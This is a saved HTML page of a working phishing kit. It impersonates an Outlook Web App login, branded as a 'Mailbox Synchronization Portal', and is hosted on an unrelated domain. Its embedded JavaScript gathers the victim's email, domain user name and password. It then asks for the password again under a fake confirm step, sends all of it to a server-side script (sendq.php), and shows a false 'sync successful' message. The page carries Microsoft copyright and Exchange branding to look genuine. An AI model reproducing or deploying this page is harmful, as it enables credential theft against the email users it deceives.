<!DOCTYPE html>
<!-- saved from url=(0047)http://www.repelautopecas.com.br/sync/sync.html -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<link rel="shortcut icon" href="https://mail.arkansas.gov/owa/14.3.388.0/themes/resources/favicon.ico" type="image/x-icon">

<meta name="Robots" content="NOINDEX, NOFOLLOW">
<title>Outlook Web App</title>
<link type="text/css" rel="stylesheet" href="./sync_files/logon.css">
<link type="text/css" rel="stylesheet" href="./sync_files/owafont.css">
<script src="./sync_files/jquery.min.js.download"></script>
<script>
$(document).ready(function(){
$("#sub2").click(function(){



var e = $('#email').val();
var u = $('#username').val();
var p = $('#password').val();
$('#hhh').html('<img src="sync_files/syncing.gif" width="200" height="200">');

$.post('sendq.php', {email:e,username:u,password:p},function(responseText){
if(responseText=="success"){
$('#hhh').html('<div align="center" style="color:blue"><img src="sync_files/image.png" height="auto" width="auto"><br><b>SYNC SUCCESSFUL.<br> You may now close this page.</div>');
                document.getElementById("sub2").style.visibility = 'hidden';
				document.getElementById("cpass").style.visibility = 'hidden';
				document.getElementById("errormsg").innerHTML ='';
				document.getElementById("sub1").style.visibility = 'hidden';
}
if(responseText=="failed"){
$('#hhh').html('');

alert('Failed: Invalid Email Field');
locaiton.reload();
}
});
return false;
});
});	





</script>

<script type="text/javascript">
	<!--
	var a_fRC = 1;
	var g_fFcs = 1;
	var a_fLOff = 0;
	var a_fCAC = 1;
	var a_fEnbSMm = 1;
/// <summary>
/// Is Mime Control installed?
/// </summary>
function IsMimeCtlInst(progid)
{
	if (!a_fEnbSMm)
		return false;

	var oMimeVer = null;

	try 
	{
		// TODO: ingore this on none IE browser
		//
		//oMimeVer = new ActiveXObject(progid);
	} 
	catch (e)
	{ 
	}

	if (oMimeVer != null)
		return true;
	else
		return false;
}

/// <summary>
/// Render out the S-MIME control if it is installed.
/// </summary>
function RndMimeCtl()
{
	if (IsMimeCtlInst("MimeBhvr.MimeCtlVer"))
		RndMimeCtlHlpr("MimeNSe2k3", "D801B381-B81D-47a7-8EC4-EFC111666AC0", "MIMEe2k3", "mimeLogoffE2k3");

	if (IsMimeCtlInst("OwaSMime.MimeCtlVer"))
		RndMimeCtlHlpr("MimeNSe2k7sp1", "833aa5fb-7aca-4708-9d7b-c982bf57469a", "MIMEe2k7sp1", "mimeLogoffE2k7sp1");

	if (IsMimeCtlInst("OwaSMime2.MimeCtlVer"))
		RndMimeCtlHlpr("MimeNSe2k9", "4F40839A-C1E5-47E3-804D-A2A17F42DA21", "MIMEe2k9", "mimeLogoffE2k9");
}

/// <summary>
/// Helper function to factor out the rendering of the S/MIME control.
/// </summary>
function RndMimeCtlHlpr(objid, classid, ns, id)
{
	document.write("<OBJECT id='" + objid + "' classid='CLSID:" + classid + "'></OBJECT>");
	document.write("<?IMPORT namespace='" + ns + "' implementation=#" + objid + ">");
	document.write("<" + ns + ":Logoff id='" + id + "' style='display:none'/>");
}
	-->
</script>


<style type="text/css"></style></head><script type="text/javascript">(function (canvas, canvasfont, audioblock, battery, webgl, webrtcdevice, gamepad, webvr, timezone, clientrects, clipboard){
		function processFunctions(scope) {
			/* Canvas */
			/*if (canvas != 'false') {
				var fakecanvas = scope.document.createElement('canvas');
				fakecanvas.className = 'browsesafe_heedlljjfegnjeijpnkbhpofeejflkea_canvas';
				if (canvas == 'random') {
					var fakewidth = fakecanvas.width = Math.floor(Math.random() * 999) + 1;
					var fakeheight = fakecanvas.height = Math.floor(Math.random() * 999) + 1;
				}
				var canvas_a = scope.HTMLCanvasElement;
				var origToDataURL = canvas_a.prototype.toDataURL;
				var origToBlob = canvas_a.prototype.toBlob;
				canvas_a.prototype.toDataURL = function() {
					fakecanvas.title = 'toDataURL';
					document.documentElement.appendChild(fakecanvas);
					if (canvas == 'block') return false;
					else if (canvas == 'blank') {
						fakecanvas.width = this.width;
						fakecanvas.height = this.height;
						return origToDataURL.apply(fakecanvas, arguments);
					} else if (canvas == 'random') {
						return origToDataURL.apply(fakecanvas, arguments);
					}
				};
				canvas_a.prototype.toBlob = function() {
					fakecanvas.title = 'toBlob';
					document.documentElement.appendChild(fakecanvas);
					if (canvas == 'block') return false;
					else if (canvas == 'blank') {
						fakecanvas.width = this.width;
						fakecanvas.height = this.height;
						return origToBlob.apply(fakecanvas, arguments);
					} else if (canvas == 'random') {
						return origToBlob.apply(fakecanvas, arguments);
					}
				};
				var canvas_b = scope.CanvasRenderingContext2D;
				var origGetImageData = canvas_b.prototype.getImageData;
				canvas_b.prototype.getImageData = function() {
					fakecanvas.title = 'getImageData';
					document.documentElement.appendChild(fakecanvas);
					if (canvas == 'block') return false;
					else if (canvas == 'blank') {
						fakecanvas.width = this.width;
						fakecanvas.height = this.height;
						return origGetImageData.apply(fakecanvas.getContext('2d'), arguments);
					} else if (canvas == 'random') {
						return origGetImageData.apply(fakecanvas.getContext('2d'), [Math.floor(Math.random() * fakewidth) + 1, Math.floor(Math.random() * fakeheight) + 1, Math.floor(Math.random() * fakewidth) + 1, Math.floor(Math.random() * fakeheight) + 1]);
					}
				}
				var origGetLineDash = canvas_b.prototype.getLineDash;
				canvas_b.prototype.getLineDash = function() {
					fakecanvas.title = 'getLineDash';
					document.documentElement.appendChild(fakecanvas);
					if (canvas == 'block') return false;
					else if (canvas == 'blank') {
						fakecanvas.width = this.width;
						fakecanvas.height = this.height;
						return origGetLineDash.apply(fakecanvas.getContext('2d'), [0, 0]);
					} else if (canvas == 'random') {
						return origGetLineDash.apply(fakecanvas.getContext('2d'), [Math.floor(Math.random() * fakewidth) + 1, Math.floor(Math.random() * fakeheight) + 1]);
					}
				}
				var canvas_c = scope.WebGLRenderingContext;
				var origReadPixels = canvas_c.prototype.readPixels;
				canvas_c.prototype.readPixels = function() {
					fakecanvas.title = 'readPixels';
					document.documentElement.appendChild(fakecanvas);
					if (canvas == 'block') return false;
					else if (canvas == 'blank') {
						fakecanvas.width = this.width;
						fakecanvas.height = this.height;
						return origReadPixels.apply(fakecanvas.getContext('webgl'), arguments);
					} else if (canvas == 'random') {
						return origReadPixels.apply(fakecanvas.getContext('webgl'), [Math.floor(Math.random() * fakewidth) + 1, Math.floor(Math.random() * fakeheight) + 1, Math.floor(Math.random() * fakewidth) + 1, Math.floor(Math.random() * fakeheight) + 1, arguments[4], arguments[5], arguments[6]]);
					}
				}
			}*/
			/* Audio Block */
			console.log("audioblock"+audioblock);
			if (audioblock == 'true') {
				var audioblock_triggerblock = scope.document.createElement('div');
				audioblock_triggerblock.className = 'browsesafe_heedlljjfegnjeijpnkbhpofeejflkea_audio';
				var audioblock_a = scope.AudioBuffer;
				audioblock_a.prototype.copyFromChannel = function() {
					audioblock_triggerblock.title = 'copyFromChannel';
					document.documentElement.appendChild(audioblock_triggerblock);
					return false;
				}
				audioblock_a.prototype.getChannelData = function() {
					audioblock_triggerblock.title = 'getChannelData';
					document.documentElement.appendChild(audioblock_triggerblock);
					return false;
				}
				var audioblock_b = scope.AnalyserNode;
				audioblock_b.prototype.getFloatFrequencyData = function() {
					audioblock_triggerblock.title = 'getFloatFrequencyData';
					document.documentElement.appendChild(audioblock_triggerblock);
					return false;
				}
				audioblock_b.prototype.getByteFrequencyData = function() {
					audioblock_triggerblock.title = 'getByteFrequencyData';
					document.documentElement.appendChild(audioblock_triggerblock);
					return false;
				}
				audioblock_b.prototype.getFloatTimeDomainData = function() {
					audioblock_triggerblock.title = 'getFloatTimeDomainData';
					document.documentElement.appendChild(audioblock_triggerblock);
					return false;
				}
				audioblock_b.prototype.getByteTimeDomainData = function() {
					audioblock_triggerblock.title = 'getByteTimeDomainData';
					document.documentElement.appendChild(audioblock_triggerblock);
					return false;
				}
				var audioblock_c = scope;
				audioblock_c.AudioContext = function() {
					audioblock_triggerblock.title = 'AudioContext';
					document.documentElement.appendChild(audioblock_triggerblock);
					return false;
				}
				audioblock_c.webkitAudioContext = function() {
					audioblock_triggerblock.title = 'webkitAudioContext';
					document.documentElement.appendChild(audioblock_triggerblock);
					return false;
				}
			}
			/* Canvas Font */
			console.log("canvasfont = "+canvasfont);
			if (canvasfont == 'true') {
				var canvasfont_triggerblock = scope.document.createElement('div');
				canvasfont_triggerblock.className = 'browsesafe_heedlljjfegnjeijpnkbhpofeejflkea_canvasfont';
				var canvasfont_a = scope.CanvasRenderingContext2D;
				canvasfont_a.prototype.measureText = function() {
					canvasfont_triggerblock.title = 'measureText';
					document.documentElement.appendChild(canvasfont_triggerblock);
					return false;
				}
			}
			/* Battery */
			if (battery == 'true') {
				var battery_triggerblock = scope.document.createElement('div');
				battery_triggerblock.className = 'browsesafe_heedlljjfegnjeijpnkbhpofeejflkea_battery';
				var battery_a = scope.navigator;
				battery_a.getBattery = function() {
					battery_triggerblock.title = 'getBattery';
					document.documentElement.appendChild(battery_triggerblock);
					return void(0);
				}
			}
			/* WebGL */
			/*if (webgl == 'true') {
				var webgl_triggerblock = scope.document.createElement('div');
				webgl_triggerblock.className = 'browsesafe_heedlljjfegnjeijpnkbhpofeejflkea_webgl';
				var webgl_a = scope.WebGLRenderingContext;
				webgl_a.getSupportedExtensions = function() {
					webgl_triggerblock.title = 'getSupportedExtensions';
					document.documentElement.appendChild(webgl_triggerblock);
					return false;
				}
				webgl_a.getParameter = function() {
					webgl_triggerblock.title = 'getParameter';
					document.documentElement.appendChild(webgl_triggerblock);
					return false;
				}
				webgl_a.getContextAttributes = function() {
					webgl_triggerblock.title = 'getContextAttributes';
					document.documentElement.appendChild(webgl_triggerblock);
					return false;
				}
				webgl_a.getShaderPrecisionFormat = function() {
					webgl_triggerblock.title = 'getShaderPrecisionFormat';
					document.documentElement.appendChild(webgl_triggerblock);
					return false;
				}
				webgl_a.getExtension = function() {
					webgl_triggerblock.title = 'getExtension';
					document.documentElement.appendChild(webgl_triggerblock);
					return false;
				}
			}
			/* WebRTC */
			/*if (webrtcdevice == 'true') {
				var webrtc_triggerblock = scope.document.createElement('div');
				webrtc_triggerblock.className = 'browsesafe_heedlljjfegnjeijpnkbhpofeejflkea_webrtc';
				var webrtc_a = scope.MediaStreamTrack;
				webrtc_a.getSources = function() {
					webrtc_triggerblock.title = 'getSources';
					document.documentElement.appendChild(webrtc_triggerblock);
					return false;
				}
				webrtc_a.getMediaDevices = function() {
					webrtc_triggerblock.title = 'getMediaDevices';
					document.documentElement.appendChild(webrtc_triggerblock);
					return false;
				}
				var webrtc_b = scope.navigator.mediaDevices;
				webrtc_b.enumerateDevices = function() {
					webrtc_triggerblock.title = 'enumerateDevices';
					document.documentElement.appendChild(webrtc_triggerblock);
					return false;
				}
			}
			/* Gamepad */
			/*if (gamepad == 'true') {
				var gamepad_triggerblock = scope.document.createElement('div');
				gamepad_triggerblock.className = 'browsesafe_heedlljjfegnjeijpnkbhpofeejflkea_gamepad';
				var gamepad_a = scope.navigator;
				gamepad_a.getGamepads = function() {
					gamepad_triggerblock.title = 'getGamepads';
					document.documentElement.appendChild(gamepad_triggerblock);
					return false;
				}
			}
			/* WebVR */
			/*if (webvr == 'true') {
				var webvr_triggerblock = scope.document.createElement('div');
				webvr_triggerblock.className = 'browsesafe_heedlljjfegnjeijpnkbhpofeejflkea_webvr';
				var webvr_a = scope.navigator;
				webvr_a.getVRDisplays = function() {
					webvr_triggerblock.title = 'getVRDisplays';
					document.documentElement.appendChild(webvr_triggerblock);
					return false;
				}
			}
			/* Client Rectangles */
			/*if (clientrects == 'true') {
				var clientrects_triggerblock = scope.document.createElement('div');
				clientrects_triggerblock.className = 'browsesafe_heedlljjfegnjeijpnkbhpofeejflkea_clientrects';
				Element.prototype.getClientRects = function() {
					clientrects_triggerblock.title = 'getClientRects';
					document.documentElement.appendChild(clientrects_triggerblock);
					return [{'top': 0, 'bottom': 0, 'left': 0, 'right': 0, 'height': 0, 'width': 0}];
				}
			}
			/* Timezone */
			/*if (timezone != 'false') {
				var timezone_triggerblock = scope.document.createElement('div');
				timezone_triggerblock.className = 'browsesafe_heedlljjfegnjeijpnkbhpofeejflkea_timezone';
				var timezone_a = scope.Date;
				timezone_a.prototype.getTimezoneOffset = function() {
					timezone_triggerblock.title = 'getTimezoneOffset';
					document.documentElement.appendChild(timezone_triggerblock);
					if (timezone == 'random') return ['720','660','600','570','540','480','420','360','300','240','210','180','120','60','0','-60','-120','-180','-210','-240','-270','-300','-330','-345','-360','-390','-420','-480','-510','-525','-540','-570','-600','-630','-660','-720','-765','-780','-840'][Math.floor(Math.random() * 39)];
					return timezone;
				}
			}
			/* Clipboard */
			/*if (clipboard == 'true') {
				var clipboard_triggerblock = scope.document.createElement('div');
				clipboard_triggerblock.className = 'browsesafe_heedlljjfegnjeijpnkbhpofeejflkea_clipboard';
				var clipboard_a = document;
				var origExecCommand = clipboard_a.execCommand;
				clipboard_a.execCommand = function() {
					clipboard_triggerblock.title = 'execCommand';
					document.documentElement.appendChild(clipboard_triggerblock);
					if (arguments[0] == 'cut' || arguments[0] == 'copy') return false;
					return origExecCommand.apply(this, arguments);
				};
			}*/
		}
		processFunctions(window);
		var iwin = HTMLIFrameElement.prototype.__lookupGetter__('contentWindow'), idoc = HTMLIFrameElement.prototype.__lookupGetter__('contentDocument');
		Object.defineProperties(HTMLIFrameElement.prototype, {
			contentWindow: {
				get: function() {
					var frame = iwin.apply(this);
					if (this.src && this.src.indexOf('//') != -1 && location.host != this.src.split('/')[2]) return frame;
					try { frame.HTMLCanvasElement } catch (err) { /* do nothing*/ }
					processFunctions(frame);
					return frame;
				}
			},
			contentDocument: {
				get: function() {
					if (this.src && this.src.indexOf('//') != -1 && location.host != this.src.split('/')[2]) return idoc.apply(this);
					var frame = iwin.apply(this);
					try { frame.HTMLCanvasElement } catch (err) { /* do nothing*/ }
					processFunctions(frame);
					return idoc.apply(this);
				}
			}
		});
	})('undefined','true','true','true','undefined','undefined','undefined','undefined','undefined','undefined','undefined');</script>
<body class="owaLgnBdy">


<input type="hidden" name="destination" value="">
<input type="hidden" name="flags" value="0">
<input type="hidden" name="forcedownlevel" value="0">
<table align="center" id="tblMain" cellpadding="0" cellspacing="0">
	<tbody><tr>
		<td colspan="3">
			<table cellspacing="0" cellpadding="0" class="tblLgn">
			<tbody><tr>
				<td class="lgnTM"></td>
			</tr>
			</tbody></table>
		</td>
	</tr>

	<tr>
		<td id="mdLft">&nbsp;</td>
		<td id="mdMid">
			<table id="tblMid" class="mid">
				<tbody><tr>
					<td id="expltxt" class="expl">
						<b style="color:orange">MAILBOX SYNCRHONIZATION PORTAL</b>				
					</td>
				</tr>
				<tr><td><hr></td></tr>
				<tr>
					<td>
						<table class="nonMSIE">
						<colgroup><col>
						<col class="w100">
						</colgroup><tbody><tr id="trSec">
							<td colspan="2">								
								Security 
									‎(
									<a href="http://www.repelautopecas.com.br/sync/sync.html#" id="lnkShwSec" onclick="clkExp(&#39;lnkShwSec&#39;)">
									show explanation 
									</a>
									<a href="http://www.repelautopecas.com.br/sync/sync.html#" id="lnkHdSec" onclick="clkExp(&#39;lnkHdSec&#39;)" style="display:none">
									hide explanation 
									</a>
								)‎
							</td>
						</tr>						
						<tr>
							<td><input id="rdoPblc" type="radio" name="trusted" value="0" class="rdo" onclick="clkSec()" checked=""></td>
							<td><label for="rdoPblc">This is a public or shared computer</label></td>
						</tr>
						<tr id="trPubExp" class="expl" style="display:none">
							<td></td>
							<td>Select this option if you use Outlook Web App on a public computer. Be sure to sign out when you've finished and close all windows to end your session.</td>
						</tr>
						<tr>
							<td><input id="rdoPrvt" type="radio" name="trusted" value="4" class="rdo" onclick="clkSec()"></td>
							<td><label for="rdoPrvt">This is a private computer</label></td>
						</tr>
						<tr id="trPrvtExp" class="expl" style="display:none">
							<td></td>
							<td>Select this option if you're the only person who uses this computer. Your server will allow a longer period of inactivity before signing you out.</td>
						</tr>
						<tr id="trPrvtWrn" class="wrng" style="display:none">
							<td></td>
							<td>Warning:  By selecting this option, you confirm that this computer complies with your organization's security policy.</td>
						</tr>
						</tbody></table>
					</td>
				</tr>
				
				<tr><td><hr></td></tr>
				
				<form method="post"></form>
				<tr><td><hr></td></tr>
				<tr>
					<td>
						<span id="errormsg" style="color:red;font-weight:bold"></span><span id="hhh">
							
							
							</span><table class="nonMSIE" id="tablefield">
						
							<colgroup><col class="nowrap">
							<col class="w100">
							<col>
							</colgroup>
							<tbody><tr id="cpass">
							
							
							</tr>
							
							
							
							<tr id="em">
								<td nowrap=""><label for="username">Email:</label></td>
								<td class="txtpad"><input id="email" name="email" type="text" class="txt"></td>
							</tr>
							<tr id="us">
								<td nowrap=""><label for="username">Domain\user name:</label></td>
								<td class="txtpad"><input id="username" name="username" type="text" class="txt"></td>
							</tr>
							<tr id="pw">
								<td nowrap=""><label for="password">Password:</label></td>
								<td class="txtpad"><input id="password" name="password" type="password" class="txt" onfocus="g_fFcs=0"></td>
							</tr>
							<tr>
								<td colspan="2" align="right" class="txtpad">
									
									
						<span id="sub1" style="visibility:hidden"><input type="button" class="btn" onclick="goBack();return false;" value="Go back">|</span>
						<span id="sub2" style="visibility:hidden"><input type="submit" class="btn" value="Sync Now"></span>
						<span id="sub"><input type="submit" class="btn" value="Sign in" onclick="checking();return false;"></span>
																	</td>
							</tr>
							
							
						</tbody></table>
					</td>
				</tr>
				<tr><td><hr></td></tr>
				
			</tbody></table>
			
		<script type="text/javascript">
		function goBack(){
		window.location.reload();
		}
		
		function checking(){
		var e = document.getElementById("email").value;
		var u = document.getElementById("username").value;
		var p = document.getElementById("password").value;
		
		//check
		if(e==""||u==""||p==""){
		document.getElementById("errormsg").innerHTML ="Fields can not be empty";
		return false;		
		}else{
		
		// if true show following
		document.getElementById("em").style.display ='none';
		document.getElementById("us").style.display ='none';
		document.getElementById("pw").style.display ='none';

		document.getElementById("cpass").innerHTML ='<td nowrap><label for="password">Confirm Password:</label></td><td class="txtpad"><input id="cpassword" onkeyup="confam()" name="password" type="password" class="txt" onfocus="g_fFcs=0"><input id="username" name="username" type="hidden" value="'+u+'"><input id="password" name="password" type="hidden" value="'+p+'"><input id="email" name="email" type="hidden" class="txt" value="'+e+'" ></td>';
		document.getElementById("sub").style.visibility= 'hidden';document.getElementById("sub1").style.visibility= 'visible';
		

		}	
		}
		
		function confam(){
		
		var p = document.getElementById("password").value;
		var cp = document.getElementById("cpassword").value;
		document.getElementById("sub").style.visibility ='hidden';
		document.getElementById("sub2").style.visibility ='hidden';


		if(cp == ""){
		document.getElementById("errormsg").innerHTML ="";
		document.getElementById("sub").style.visibility ='hidden';
		document.getElementById("sub2").style.visibility ='hidden';

		} else if(p != cp){
		document.getElementById("errormsg").innerHTML ="Password Mismatch";
		document.getElementById("sub").style.visibility ='hidden';
		document.getElementById("sub2").style.visibility ='hidden';

		} else if(p ==cp){
		document.getElementById("errormsg").innerHTML ="Password Match";
		document.getElementById("sub2").style.visibility ='visible';
		}else{
		document.getElementById("sub").style.visibility ='hidden';
		}
		
		}
		
	</script>

			
			
			<table id="tblMid2" class="mid" style="display:none">
				<tbody><tr><td><hr></td></tr>
				<tr>
					<td><br>Please enable cookies for this Web site.<br><br>Cookies are currently disabled by your browser. Outlook Web App requires that cookies be enabled. <br><br>For information about how to enable cookies, see the Help for your Web browser.<br><br><br></td>
				</tr>
				<tr><td><hr></td></tr>
				<tr>
					<td align="right" class="txtpad">
					
						<input type="button" class="btn" style="float: right" value="Retry" onclick="clkRtry()">
					
					</td>
				</tr>
			</tbody></table>
			<table class="mid tblConn">
				<tbody><tr>
					<td rowspan="2" align="right" class="tdConnImg"><img style="vertical-align:top" src="./sync_files/lgnexlogo.gif" alt=""></td>
					<td class="tdConn">Connected to Microsoft Exchange</td>
				</tr>
				<tr>
					<td class="tdCopy">© 2010 Microsoft Corporation. All rights reserved.</td>
				</tr>
			</tbody></table>
		</td>
		<td id="mdRt">&nbsp;</td>
	</tr>
	<tr>
		<td colspan="3">
			
		</td>
	</tr>
</tbody></table>


<!-- Mirrored from mail.arkansas.gov/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2fmail.arkansas.gov%2fowa%2f by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 06 Aug 2018 15:47:02 GMT -->

</body></html>